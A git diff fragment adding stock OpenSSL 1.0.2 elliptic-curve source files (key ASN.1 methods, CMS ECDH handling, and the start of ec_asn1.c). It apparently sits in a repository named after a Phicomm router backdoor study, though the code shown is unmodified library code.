+static int ecdh_cms_encrypt(CMS_RecipientInfo *ri);
+
+static int eckey_param2type(int *pptype, void **ppval, EC_KEY *ec_key)
+{
+    const EC_GROUP *group;
+    int nid;
+    if (ec_key == NULL || (group = EC_KEY_get0_group(ec_key)) == NULL) {
+        ECerr(EC_F_ECKEY_PARAM2TYPE, EC_R_MISSING_PARAMETERS);
+        return 0;
+    }
+    if (EC_GROUP_get_asn1_flag(group)
+        && (nid = EC_GROUP_get_curve_name(group)))
+        /* we have a 'named curve' => just set the OID */
+    {
+        *ppval = OBJ_nid2obj(nid);
+        *pptype = V_ASN1_OBJECT;
+    } else {                    /* explicit parameters */
+
+        ASN1_STRING *pstr = NULL;
+        pstr = ASN1_STRING_new();
+        if (!pstr)
+            return 0;
+        pstr->length = i2d_ECParameters(ec_key, &pstr->data);
+        if (pstr->length <= 0) {
+            ASN1_STRING_free(pstr);
+            ECerr(EC_F_ECKEY_PARAM2TYPE, ERR_R_EC_LIB);
+            return 0;
+        }
+        *ppval = pstr;
+        *pptype = V_ASN1_SEQUENCE;
+    }
+    return 1;
+}
+
+static int eckey_pub_encode(X509_PUBKEY *pk, const EVP_PKEY *pkey)
+{
+    EC_KEY *ec_key = pkey->pkey.ec;
+    void *pval = NULL;
+    int ptype;
+    unsigned char *penc = NULL, *p;
+    int penclen;
+
+    if (!eckey_param2type(&ptype, &pval, ec_key)) {
+        ECerr(EC_F_ECKEY_PUB_ENCODE, ERR_R_EC_LIB);
+        return 0;
+    }
+    penclen = i2o_ECPublicKey(ec_key, NULL);
+    if (penclen <= 0)
+        goto err;
+    penc = OPENSSL_malloc(penclen);
+    if (!penc)
+        goto err;
+    p = penc;
+    penclen = i2o_ECPublicKey(ec_key, &p);
+    if (penclen <= 0)
+        goto err;
+    if (X509_PUBKEY_set0_param(pk, OBJ_nid2obj(EVP_PKEY_EC),
+                               ptype, pval, penc, penclen))
+        return 1;
+ err:
+    if (ptype == V_ASN1_OBJECT)
+        ASN1_OBJECT_free(pval);
+    else
+        ASN1_STRING_free(pval);
+    if (penc)
+        OPENSSL_free(penc);
+    return 0;
+}
+
+static EC_KEY *eckey_type2param(int ptype, void *pval)
+{
+    EC_KEY *eckey = NULL;
+    if (ptype == V_ASN1_SEQUENCE) {
+        ASN1_STRING *pstr = pval;
+        const unsigned char *pm = NULL;
+        int pmlen;
+        pm = pstr->data;
+        pmlen = pstr->length;
+        if (!(eckey = d2i_ECParameters(NULL, &pm, pmlen))) {
+            ECerr(EC_F_ECKEY_TYPE2PARAM, EC_R_DECODE_ERROR);
+            goto ecerr;
+        }
+    } else if (ptype == V_ASN1_OBJECT) {
+        ASN1_OBJECT *poid = pval;
+        EC_GROUP *group;
+
+        /*
+         * type == V_ASN1_OBJECT => the parameters are given by an asn1 OID
+         */
+        if ((eckey = EC_KEY_new()) == NULL) {
+            ECerr(EC_F_ECKEY_TYPE2PARAM, ERR_R_MALLOC_FAILURE);
+            goto ecerr;
+        }
+        group = EC_GROUP_new_by_curve_name(OBJ_obj2nid(poid));
+        if (group == NULL)
+            goto ecerr;
+        EC_GROUP_set_asn1_flag(group, OPENSSL_EC_NAMED_CURVE);
+        if (EC_KEY_set_group(eckey, group) == 0)
+            goto ecerr;
+        EC_GROUP_free(group);
+    } else {
+        ECerr(EC_F_ECKEY_TYPE2PARAM, EC_R_DECODE_ERROR);
+        goto ecerr;
+    }
+
+    return eckey;
+
+ ecerr:
+    if (eckey)
+        EC_KEY_free(eckey);
+    return NULL;
+}
+
+static int eckey_pub_decode(EVP_PKEY *pkey, X509_PUBKEY *pubkey)
+{
+    const unsigned char *p = NULL;
+    void *pval;
+    int ptype, pklen;
+    EC_KEY *eckey = NULL;
+    X509_ALGOR *palg;
+
+    if (!X509_PUBKEY_get0_param(NULL, &p, &pklen, &palg, pubkey))
+        return 0;
+    X509_ALGOR_get0(NULL, &ptype, &pval, palg);
+
+    eckey = eckey_type2param(ptype, pval);
+
+    if (!eckey) {
+        ECerr(EC_F_ECKEY_PUB_DECODE, ERR_R_EC_LIB);
+        return 0;
+    }
+
+    /* We have parameters now set public key */
+    if (!o2i_ECPublicKey(&eckey, &p, pklen)) {
+        ECerr(EC_F_ECKEY_PUB_DECODE, EC_R_DECODE_ERROR);
+        goto ecerr;
+    }
+
+    EVP_PKEY_assign_EC_KEY(pkey, eckey);
+    return 1;
+
+ ecerr:
+    if (eckey)
+        EC_KEY_free(eckey);
+    return 0;
+}
+
+static int eckey_pub_cmp(const EVP_PKEY *a, const EVP_PKEY *b)
+{
+    int r;
+    const EC_GROUP *group = EC_KEY_get0_group(b->pkey.ec);
+    const EC_POINT *pa = EC_KEY_get0_public_key(a->pkey.ec),
+        *pb = EC_KEY_get0_public_key(b->pkey.ec);
+    r = EC_POINT_cmp(group, pa, pb, NULL);
+    if (r == 0)
+        return 1;
+    if (r == 1)
+        return 0;
+    return -2;
+}
+
+static int eckey_priv_decode(EVP_PKEY *pkey, PKCS8_PRIV_KEY_INFO *p8)
+{
+    const unsigned char *p = NULL;
+    void *pval;
+    int ptype, pklen;
+    EC_KEY *eckey = NULL;
+    X509_ALGOR *palg;
+
+    if (!PKCS8_pkey_get0(NULL, &p, &pklen, &palg, p8))
+        return 0;
+    X509_ALGOR_get0(NULL, &ptype, &pval, palg);
+
+    eckey = eckey_type2param(ptype, pval);
+
+    if (!eckey)
+        goto ecliberr;
+
+    /* We have parameters now set private key */
+    if (!d2i_ECPrivateKey(&eckey, &p, pklen)) {
+        ECerr(EC_F_ECKEY_PRIV_DECODE, EC_R_DECODE_ERROR);
+        goto ecerr;
+    }
+
+    /* calculate public key (if necessary) */
+    if (EC_KEY_get0_public_key(eckey) == NULL) {
+        const BIGNUM *priv_key;
+        const EC_GROUP *group;
+        EC_POINT *pub_key;
+        /*
+         * the public key was not included in the SEC1 private key =>
+         * calculate the public key
+         */
+        group = EC_KEY_get0_group(eckey);
+        pub_key = EC_POINT_new(group);
+        if (pub_key == NULL) {
+            ECerr(EC_F_ECKEY_PRIV_DECODE, ERR_R_EC_LIB);
+            goto ecliberr;
+        }
+        if (!EC_POINT_copy(pub_key, EC_GROUP_get0_generator(group))) {
+            EC_POINT_free(pub_key);
+            ECerr(EC_F_ECKEY_PRIV_DECODE, ERR_R_EC_LIB);
+            goto ecliberr;
+        }
+        priv_key = EC_KEY_get0_private_key(eckey);
+        if (!EC_POINT_mul(group, pub_key, priv_key, NULL, NULL, NULL)) {
+            EC_POINT_free(pub_key);
+            ECerr(EC_F_ECKEY_PRIV_DECODE, ERR_R_EC_LIB);
+            goto ecliberr;
+        }
+        if (EC_KEY_set_public_key(eckey, pub_key) == 0) {
+            EC_POINT_free(pub_key);
+            ECerr(EC_F_ECKEY_PRIV_DECODE, ERR_R_EC_LIB);
+            goto ecliberr;
+        }
+        EC_POINT_free(pub_key);
+    }
+
+    EVP_PKEY_assign_EC_KEY(pkey, eckey);
+    return 1;
+
+ ecliberr:
+    ECerr(EC_F_ECKEY_PRIV_DECODE, ERR_R_EC_LIB);
+ ecerr:
+    if (eckey)
+        EC_KEY_free(eckey);
+    return 0;
+}
+
+static int eckey_priv_encode(PKCS8_PRIV_KEY_INFO *p8, const EVP_PKEY *pkey)
+{
+    EC_KEY *ec_key;
+    unsigned char *ep, *p;
+    int eplen, ptype;
+    void *pval;
+    unsigned int tmp_flags, old_flags;
+
+    ec_key = pkey->pkey.ec;
+
+    if (!eckey_param2type(&ptype, &pval, ec_key)) {
+        ECerr(EC_F_ECKEY_PRIV_ENCODE, EC_R_DECODE_ERROR);
+        return 0;
+    }
+
+    /* set the private key */
+
+    /*
+     * do not include the parameters in the SEC1 private key see PKCS#11
+     * 12.11
+     */
+    old_flags = EC_KEY_get_enc_flags(ec_key);
+    tmp_flags = old_flags | EC_PKEY_NO_PARAMETERS;
+    EC_KEY_set_enc_flags(ec_key, tmp_flags);
+    eplen = i2d_ECPrivateKey(ec_key, NULL);
+    if (!eplen) {
+        EC_KEY_set_enc_flags(ec_key, old_flags);
+        ECerr(EC_F_ECKEY_PRIV_ENCODE, ERR_R_EC_LIB);
+        return 0;
+    }
+    ep = (unsigned char *)OPENSSL_malloc(eplen);
+    if (!ep) {
+        EC_KEY_set_enc_flags(ec_key, old_flags);
+        ECerr(EC_F_ECKEY_PRIV_ENCODE, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    p = ep;
+    if (!i2d_ECPrivateKey(ec_key, &p)) {
+        EC_KEY_set_enc_flags(ec_key, old_flags);
+        OPENSSL_free(ep);
+        ECerr(EC_F_ECKEY_PRIV_ENCODE, ERR_R_EC_LIB);
+        return 0;
+    }
+    /* restore old encoding flags */
+    EC_KEY_set_enc_flags(ec_key, old_flags);
+
+    if (!PKCS8_pkey_set0(p8, OBJ_nid2obj(NID_X9_62_id_ecPublicKey), 0,
+                         ptype, pval, ep, eplen))
+        return 0;
+
+    return 1;
+}
+
+static int int_ec_size(const EVP_PKEY *pkey)
+{
+    return ECDSA_size(pkey->pkey.ec);
+}
+
+static int ec_bits(const EVP_PKEY *pkey)
+{
+    BIGNUM *order = BN_new();
+    const EC_GROUP *group;
+    int ret;
+
+    if (!order) {
+        ERR_clear_error();
+        return 0;
+    }
+    group = EC_KEY_get0_group(pkey->pkey.ec);
+    if (!EC_GROUP_get_order(group, order, NULL)) {
+        ERR_clear_error();
+        return 0;
+    }
+
+    ret = BN_num_bits(order);
+    BN_free(order);
+    return ret;
+}
+
+static int ec_missing_parameters(const EVP_PKEY *pkey)
+{
+    if (EC_KEY_get0_group(pkey->pkey.ec) == NULL)
+        return 1;
+    return 0;
+}
+
+static int ec_copy_parameters(EVP_PKEY *to, const EVP_PKEY *from)
+{
+    EC_GROUP *group = EC_GROUP_dup(EC_KEY_get0_group(from->pkey.ec));
+    if (group == NULL)
+        return 0;
+    if (EC_KEY_set_group(to->pkey.ec, group) == 0)
+        return 0;
+    EC_GROUP_free(group);
+    return 1;
+}
+
+static int ec_cmp_parameters(const EVP_PKEY *a, const EVP_PKEY *b)
+{
+    const EC_GROUP *group_a = EC_KEY_get0_group(a->pkey.ec),
+        *group_b = EC_KEY_get0_group(b->pkey.ec);
+    if (EC_GROUP_cmp(group_a, group_b, NULL))
+        return 0;
+    else
+        return 1;
+}
+
+static void int_ec_free(EVP_PKEY *pkey)
+{
+    EC_KEY_free(pkey->pkey.ec);
+}
+
+static int do_EC_KEY_print(BIO *bp, const EC_KEY *x, int off, int ktype)
+{
+    unsigned char *buffer = NULL;
+    const char *ecstr;
+    size_t buf_len = 0, i;
+    int ret = 0, reason = ERR_R_BIO_LIB;
+    BIGNUM *pub_key = NULL, *order = NULL;
+    BN_CTX *ctx = NULL;
+    const EC_GROUP *group;
+    const EC_POINT *public_key;
+    const BIGNUM *priv_key;
+
+    if (x == NULL || (group = EC_KEY_get0_group(x)) == NULL) {
+        reason = ERR_R_PASSED_NULL_PARAMETER;
+        goto err;
+    }
+
+    ctx = BN_CTX_new();
+    if (ctx == NULL) {
+        reason = ERR_R_MALLOC_FAILURE;
+        goto err;
+    }
+
+    if (ktype > 0) {
+        public_key = EC_KEY_get0_public_key(x);
+        if (public_key != NULL) {
+            if ((pub_key = EC_POINT_point2bn(group, public_key,
+                                             EC_KEY_get_conv_form(x), NULL,
+                                             ctx)) == NULL) {
+                reason = ERR_R_EC_LIB;
+                goto err;
+            }
+            buf_len = (size_t)BN_num_bytes(pub_key);
+        }
+    }
+
+    if (ktype == 2) {
+        priv_key = EC_KEY_get0_private_key(x);
+        if (priv_key && (i = (size_t)BN_num_bytes(priv_key)) > buf_len)
+            buf_len = i;
+    } else
+        priv_key = NULL;
+
+    if (ktype > 0) {
+        buf_len += 10;
+        if ((buffer = OPENSSL_malloc(buf_len)) == NULL) {
+            reason = ERR_R_MALLOC_FAILURE;
+            goto err;
+        }
+    }
+    if (ktype == 2)
+        ecstr = "Private-Key";
+    else if (ktype == 1)
+        ecstr = "Public-Key";
+    else
+        ecstr = "ECDSA-Parameters";
+
+    if (!BIO_indent(bp, off, 128))
+        goto err;
+    if ((order = BN_new()) == NULL)
+        goto err;
+    if (!EC_GROUP_get_order(group, order, NULL))
+        goto err;
+    if (BIO_printf(bp, "%s: (%d bit)\n", ecstr, BN_num_bits(order)) <= 0)
+        goto err;
+
+    if ((priv_key != NULL) && !ASN1_bn_print(bp, "priv:", priv_key,
+                                             buffer, off))
+        goto err;
+    if ((pub_key != NULL) && !ASN1_bn_print(bp, "pub: ", pub_key,
+                                            buffer, off))
+        goto err;
+    if (!ECPKParameters_print(bp, group, off))
+        goto err;
+    ret = 1;
+ err:
+    if (!ret)
+        ECerr(EC_F_DO_EC_KEY_PRINT, reason);
+    if (pub_key)
+        BN_free(pub_key);
+    if (order)
+        BN_free(order);
+    if (ctx)
+        BN_CTX_free(ctx);
+    if (buffer != NULL)
+        OPENSSL_free(buffer);
+    return (ret);
+}
+
+static int eckey_param_decode(EVP_PKEY *pkey,
+                              const unsigned char **pder, int derlen)
+{
+    EC_KEY *eckey;
+    if (!(eckey = d2i_ECParameters(NULL, pder, derlen))) {
+        ECerr(EC_F_ECKEY_PARAM_DECODE, ERR_R_EC_LIB);
+        return 0;
+    }
+    EVP_PKEY_assign_EC_KEY(pkey, eckey);
+    return 1;
+}
+
+static int eckey_param_encode(const EVP_PKEY *pkey, unsigned char **pder)
+{
+    return i2d_ECParameters(pkey->pkey.ec, pder);
+}
+
+static int eckey_param_print(BIO *bp, const EVP_PKEY *pkey, int indent,
+                             ASN1_PCTX *ctx)
+{
+    return do_EC_KEY_print(bp, pkey->pkey.ec, indent, 0);
+}
+
+static int eckey_pub_print(BIO *bp, const EVP_PKEY *pkey, int indent,
+                           ASN1_PCTX *ctx)
+{
+    return do_EC_KEY_print(bp, pkey->pkey.ec, indent, 1);
+}
+
+static int eckey_priv_print(BIO *bp, const EVP_PKEY *pkey, int indent,
+                            ASN1_PCTX *ctx)
+{
+    return do_EC_KEY_print(bp, pkey->pkey.ec, indent, 2);
+}
+
+static int old_ec_priv_decode(EVP_PKEY *pkey,
+                              const unsigned char **pder, int derlen)
+{
+    EC_KEY *ec;
+    if (!(ec = d2i_ECPrivateKey(NULL, pder, derlen))) {
+        ECerr(EC_F_OLD_EC_PRIV_DECODE, EC_R_DECODE_ERROR);
+        return 0;
+    }
+    EVP_PKEY_assign_EC_KEY(pkey, ec);
+    return 1;
+}
+
+static int old_ec_priv_encode(const EVP_PKEY *pkey, unsigned char **pder)
+{
+    return i2d_ECPrivateKey(pkey->pkey.ec, pder);
+}
+
+static int ec_pkey_ctrl(EVP_PKEY *pkey, int op, long arg1, void *arg2)
+{
+    switch (op) {
+    case ASN1_PKEY_CTRL_PKCS7_SIGN:
+        if (arg1 == 0) {
+            int snid, hnid;
+            X509_ALGOR *alg1, *alg2;
+            PKCS7_SIGNER_INFO_get0_algs(arg2, NULL, &alg1, &alg2);
+            if (alg1 == NULL || alg1->algorithm == NULL)
+                return -1;
+            hnid = OBJ_obj2nid(alg1->algorithm);
+            if (hnid == NID_undef)
+                return -1;
+            if (!OBJ_find_sigid_by_algs(&snid, hnid, EVP_PKEY_id(pkey)))
+                return -1;
+            X509_ALGOR_set0(alg2, OBJ_nid2obj(snid), V_ASN1_UNDEF, 0);
+        }
+        return 1;
+#ifndef OPENSSL_NO_CMS
+    case ASN1_PKEY_CTRL_CMS_SIGN:
+        if (arg1 == 0) {
+            int snid, hnid;
+            X509_ALGOR *alg1, *alg2;
+            CMS_SignerInfo_get0_algs(arg2, NULL, NULL, &alg1, &alg2);
+            if (alg1 == NULL || alg1->algorithm == NULL)
+                return -1;
+            hnid = OBJ_obj2nid(alg1->algorithm);
+            if (hnid == NID_undef)
+                return -1;
+            if (!OBJ_find_sigid_by_algs(&snid, hnid, EVP_PKEY_id(pkey)))
+                return -1;
+            X509_ALGOR_set0(alg2, OBJ_nid2obj(snid), V_ASN1_UNDEF, 0);
+        }
+        return 1;
+
+    case ASN1_PKEY_CTRL_CMS_ENVELOPE:
+        if (arg1 == 1)
+            return ecdh_cms_decrypt(arg2);
+        else if (arg1 == 0)
+            return ecdh_cms_encrypt(arg2);
+        return -2;
+
+    case ASN1_PKEY_CTRL_CMS_RI_TYPE:
+        *(int *)arg2 = CMS_RECIPINFO_AGREE;
+        return 1;
+#endif
+
+    case ASN1_PKEY_CTRL_DEFAULT_MD_NID:
+        *(int *)arg2 = NID_sha256;
+        return 2;
+
+    default:
+        return -2;
+
+    }
+
+}
+
+const EVP_PKEY_ASN1_METHOD eckey_asn1_meth = {
+    EVP_PKEY_EC,
+    EVP_PKEY_EC,
+    0,
+    "EC",
+    "OpenSSL EC algorithm",
+
+    eckey_pub_decode,
+    eckey_pub_encode,
+    eckey_pub_cmp,
+    eckey_pub_print,
+
+    eckey_priv_decode,
+    eckey_priv_encode,
+    eckey_priv_print,
+
+    int_ec_size,
+    ec_bits,
+
+    eckey_param_decode,
+    eckey_param_encode,
+    ec_missing_parameters,
+    ec_copy_parameters,
+    ec_cmp_parameters,
+    eckey_param_print,
+    0,
+
+    int_ec_free,
+    ec_pkey_ctrl,
+    old_ec_priv_decode,
+    old_ec_priv_encode
+};
+
+#ifndef OPENSSL_NO_CMS
+
+static int ecdh_cms_set_peerkey(EVP_PKEY_CTX *pctx,
+                                X509_ALGOR *alg, ASN1_BIT_STRING *pubkey)
+{
+    ASN1_OBJECT *aoid;
+    int atype;
+    void *aval;
+    int rv = 0;
+    EVP_PKEY *pkpeer = NULL;
+    EC_KEY *ecpeer = NULL;
+    const unsigned char *p;
+    int plen;
+    X509_ALGOR_get0(&aoid, &atype, &aval, alg);
+    if (OBJ_obj2nid(aoid) != NID_X9_62_id_ecPublicKey)
+        goto err;
+    /* If absent parameters get group from main key */
+    if (atype == V_ASN1_UNDEF || atype == V_ASN1_NULL) {
+        const EC_GROUP *grp;
+        EVP_PKEY *pk;
+        pk = EVP_PKEY_CTX_get0_pkey(pctx);
+        if (!pk)
+            goto err;
+        grp = EC_KEY_get0_group(pk->pkey.ec);
+        ecpeer = EC_KEY_new();
+        if (!ecpeer)
+            goto err;
+        if (!EC_KEY_set_group(ecpeer, grp))
+            goto err;
+    } else {
+        ecpeer = eckey_type2param(atype, aval);
+        if (!ecpeer)
+            goto err;
+    }
+    /* We have parameters now set public key */
+    plen = ASN1_STRING_length(pubkey);
+    p = ASN1_STRING_data(pubkey);
+    if (!p || !plen)
+        goto err;
+    if (!o2i_ECPublicKey(&ecpeer, &p, plen))
+        goto err;
+    pkpeer = EVP_PKEY_new();
+    if (!pkpeer)
+        goto err;
+    EVP_PKEY_set1_EC_KEY(pkpeer, ecpeer);
+    if (EVP_PKEY_derive_set_peer(pctx, pkpeer) > 0)
+        rv = 1;
+ err:
+    if (ecpeer)
+        EC_KEY_free(ecpeer);
+    if (pkpeer)
+        EVP_PKEY_free(pkpeer);
+    return rv;
+}
+
+/* Set KDF parameters based on KDF NID */
+static int ecdh_cms_set_kdf_param(EVP_PKEY_CTX *pctx, int eckdf_nid)
+{
+    int kdf_nid, kdfmd_nid, cofactor;
+    const EVP_MD *kdf_md;
+    if (eckdf_nid == NID_undef)
+        return 0;
+
+    /* Lookup KDF type, cofactor mode and digest */
+    if (!OBJ_find_sigid_algs(eckdf_nid, &kdfmd_nid, &kdf_nid))
+        return 0;
+
+    if (kdf_nid == NID_dh_std_kdf)
+        cofactor = 0;
+    else if (kdf_nid == NID_dh_cofactor_kdf)
+        cofactor = 1;
+    else
+        return 0;
+
+    if (EVP_PKEY_CTX_set_ecdh_cofactor_mode(pctx, cofactor) <= 0)
+        return 0;
+
+    if (EVP_PKEY_CTX_set_ecdh_kdf_type(pctx, EVP_PKEY_ECDH_KDF_X9_62) <= 0)
+        return 0;
+
+    kdf_md = EVP_get_digestbynid(kdfmd_nid);
+    if (!kdf_md)
+        return 0;
+
+    if (EVP_PKEY_CTX_set_ecdh_kdf_md(pctx, kdf_md) <= 0)
+        return 0;
+    return 1;
+}
+
+static int ecdh_cms_set_shared_info(EVP_PKEY_CTX *pctx, CMS_RecipientInfo *ri)
+{
+    int rv = 0;
+
+    X509_ALGOR *alg, *kekalg = NULL;
+    ASN1_OCTET_STRING *ukm;
+    const unsigned char *p;
+    unsigned char *der = NULL;
+    int plen, keylen;
+    const EVP_CIPHER *kekcipher;
+    EVP_CIPHER_CTX *kekctx;
+
+    if (!CMS_RecipientInfo_kari_get0_alg(ri, &alg, &ukm))
+        return 0;
+
+    if (!ecdh_cms_set_kdf_param(pctx, OBJ_obj2nid(alg->algorithm))) {
+        ECerr(EC_F_ECDH_CMS_SET_SHARED_INFO, EC_R_KDF_PARAMETER_ERROR);
+        return 0;
+    }
+
+    if (alg->parameter->type != V_ASN1_SEQUENCE)
+        return 0;
+
+    p = alg->parameter->value.sequence->data;
+    plen = alg->parameter->value.sequence->length;
+    kekalg = d2i_X509_ALGOR(NULL, &p, plen);
+    if (!kekalg)
+        goto err;
+    kekctx = CMS_RecipientInfo_kari_get0_ctx(ri);
+    if (!kekctx)
+        goto err;
+    kekcipher = EVP_get_cipherbyobj(kekalg->algorithm);
+    if (!kekcipher || EVP_CIPHER_mode(kekcipher) != EVP_CIPH_WRAP_MODE)
+        goto err;
+    if (!EVP_EncryptInit_ex(kekctx, kekcipher, NULL, NULL, NULL))
+        goto err;
+    if (EVP_CIPHER_asn1_to_param(kekctx, kekalg->parameter) <= 0)
+        goto err;
+
+    keylen = EVP_CIPHER_CTX_key_length(kekctx);
+    if (EVP_PKEY_CTX_set_ecdh_kdf_outlen(pctx, keylen) <= 0)
+        goto err;
+
+    plen = CMS_SharedInfo_encode(&der, kekalg, ukm, keylen);
+
+    if (!plen)
+        goto err;
+
+    if (EVP_PKEY_CTX_set0_ecdh_kdf_ukm(pctx, der, plen) <= 0)
+        goto err;
+    der = NULL;
+
+    rv = 1;
+ err:
+    if (kekalg)
+        X509_ALGOR_free(kekalg);
+    if (der)
+        OPENSSL_free(der);
+    return rv;
+}
+
+static int ecdh_cms_decrypt(CMS_RecipientInfo *ri)
+{
+    EVP_PKEY_CTX *pctx;
+    pctx = CMS_RecipientInfo_get0_pkey_ctx(ri);
+    if (!pctx)
+        return 0;
+    /* See if we need to set peer key */
+    if (!EVP_PKEY_CTX_get0_peerkey(pctx)) {
+        X509_ALGOR *alg;
+        ASN1_BIT_STRING *pubkey;
+        if (!CMS_RecipientInfo_kari_get0_orig_id(ri, &alg, &pubkey,
+                                                 NULL, NULL, NULL))
+            return 0;
+        if (!alg || !pubkey)
+            return 0;
+        if (!ecdh_cms_set_peerkey(pctx, alg, pubkey)) {
+            ECerr(EC_F_ECDH_CMS_DECRYPT, EC_R_PEER_KEY_ERROR);
+            return 0;
+        }
+    }
+    /* Set ECDH derivation parameters and initialise unwrap context */
+    if (!ecdh_cms_set_shared_info(pctx, ri)) {
+        ECerr(EC_F_ECDH_CMS_DECRYPT, EC_R_SHARED_INFO_ERROR);
+        return 0;
+    }
+    return 1;
+}
+
+static int ecdh_cms_encrypt(CMS_RecipientInfo *ri)
+{
+    EVP_PKEY_CTX *pctx;
+    EVP_PKEY *pkey;
+    EVP_CIPHER_CTX *ctx;
+    int keylen;
+    X509_ALGOR *talg, *wrap_alg = NULL;
+    ASN1_OBJECT *aoid;
+    ASN1_BIT_STRING *pubkey;
+    ASN1_STRING *wrap_str;
+    ASN1_OCTET_STRING *ukm;
+    unsigned char *penc = NULL;
+    int penclen;
+    int rv = 0;
+    int ecdh_nid, kdf_type, kdf_nid, wrap_nid;
+    const EVP_MD *kdf_md;
+    pctx = CMS_RecipientInfo_get0_pkey_ctx(ri);
+    if (!pctx)
+        return 0;
+    /* Get ephemeral key */
+    pkey = EVP_PKEY_CTX_get0_pkey(pctx);
+    if (!CMS_RecipientInfo_kari_get0_orig_id(ri, &talg, &pubkey,
+                                             NULL, NULL, NULL))
+        goto err;
+    X509_ALGOR_get0(&aoid, NULL, NULL, talg);
+    /* Is everything uninitialised? */
+    if (aoid == OBJ_nid2obj(NID_undef)) {
+
+        EC_KEY *eckey = pkey->pkey.ec;
+        /* Set the key */
+        unsigned char *p;
+
+        penclen = i2o_ECPublicKey(eckey, NULL);
+        if (penclen <= 0)
+            goto err;
+        penc = OPENSSL_malloc(penclen);
+        if (!penc)
+            goto err;
+        p = penc;
+        penclen = i2o_ECPublicKey(eckey, &p);
+        if (penclen <= 0)
+            goto err;
+        ASN1_STRING_set0(pubkey, penc, penclen);
+        pubkey->flags &= ~(ASN1_STRING_FLAG_BITS_LEFT | 0x07);
+        pubkey->flags |= ASN1_STRING_FLAG_BITS_LEFT;
+
+        penc = NULL;
+        X509_ALGOR_set0(talg, OBJ_nid2obj(NID_X9_62_id_ecPublicKey),
+                        V_ASN1_UNDEF, NULL);
+    }
+
+    /* See if custom paraneters set */
+    kdf_type = EVP_PKEY_CTX_get_ecdh_kdf_type(pctx);
+    if (kdf_type <= 0)
+        goto err;
+    if (!EVP_PKEY_CTX_get_ecdh_kdf_md(pctx, &kdf_md))
+        goto err;
+    ecdh_nid = EVP_PKEY_CTX_get_ecdh_cofactor_mode(pctx);
+    if (ecdh_nid < 0)
+        goto err;
+    else if (ecdh_nid == 0)
+        ecdh_nid = NID_dh_std_kdf;
+    else if (ecdh_nid == 1)
+        ecdh_nid = NID_dh_cofactor_kdf;
+
+    if (kdf_type == EVP_PKEY_ECDH_KDF_NONE) {
+        kdf_type = EVP_PKEY_ECDH_KDF_X9_62;
+        if (EVP_PKEY_CTX_set_ecdh_kdf_type(pctx, kdf_type) <= 0)
+            goto err;
+    } else
+        /* Uknown KDF */
+        goto err;
+    if (kdf_md == NULL) {
+        /* Fixme later for better MD */
+        kdf_md = EVP_sha1();
+        if (EVP_PKEY_CTX_set_ecdh_kdf_md(pctx, kdf_md) <= 0)
+            goto err;
+    }
+
+    if (!CMS_RecipientInfo_kari_get0_alg(ri, &talg, &ukm))
+        goto err;
+
+    /* Lookup NID for KDF+cofactor+digest */
+
+    if (!OBJ_find_sigid_by_algs(&kdf_nid, EVP_MD_type(kdf_md), ecdh_nid))
+        goto err;
+    /* Get wrap NID */
+    ctx = CMS_RecipientInfo_kari_get0_ctx(ri);
+    wrap_nid = EVP_CIPHER_CTX_type(ctx);
+    keylen = EVP_CIPHER_CTX_key_length(ctx);
+
+    /* Package wrap algorithm in an AlgorithmIdentifier */
+
+    wrap_alg = X509_ALGOR_new();
+    if (!wrap_alg)
+        goto err;
+    wrap_alg->algorithm = OBJ_nid2obj(wrap_nid);
+    wrap_alg->parameter = ASN1_TYPE_new();
+    if (!wrap_alg->parameter)
+        goto err;
+    if (EVP_CIPHER_param_to_asn1(ctx, wrap_alg->parameter) <= 0)
+        goto err;
+    if (ASN1_TYPE_get(wrap_alg->parameter) == NID_undef) {
+        ASN1_TYPE_free(wrap_alg->parameter);
+        wrap_alg->parameter = NULL;
+    }
+
+    if (EVP_PKEY_CTX_set_ecdh_kdf_outlen(pctx, keylen) <= 0)
+        goto err;
+
+    penclen = CMS_SharedInfo_encode(&penc, wrap_alg, ukm, keylen);
+
+    if (!penclen)
+        goto err;
+
+    if (EVP_PKEY_CTX_set0_ecdh_kdf_ukm(pctx, penc, penclen) <= 0)
+        goto err;
+    penc = NULL;
+
+    /*
+     * Now need to wrap encoding of wrap AlgorithmIdentifier into parameter
+     * of another AlgorithmIdentifier.
+     */
+    penclen = i2d_X509_ALGOR(wrap_alg, &penc);
+    if (!penc || !penclen)
+        goto err;
+    wrap_str = ASN1_STRING_new();
+    if (!wrap_str)
+        goto err;
+    ASN1_STRING_set0(wrap_str, penc, penclen);
+    penc = NULL;
+    X509_ALGOR_set0(talg, OBJ_nid2obj(kdf_nid), V_ASN1_SEQUENCE, wrap_str);
+
+    rv = 1;
+
+ err:
+    if (penc)
+        OPENSSL_free(penc);
+    if (wrap_alg)
+        X509_ALGOR_free(wrap_alg);
+    return rv;
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_asn1.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_asn1.c
new file mode 100644
index 0000000..2924374
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_asn1.c
@@ -0,0 +1,1311 @@
+/* crypto/ec/ec_asn1.c */
+/*
+ * Written by Nils Larsch for the OpenSSL project.
+ */
+/* ====================================================================
+ * Copyright (c) 2000-2003 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
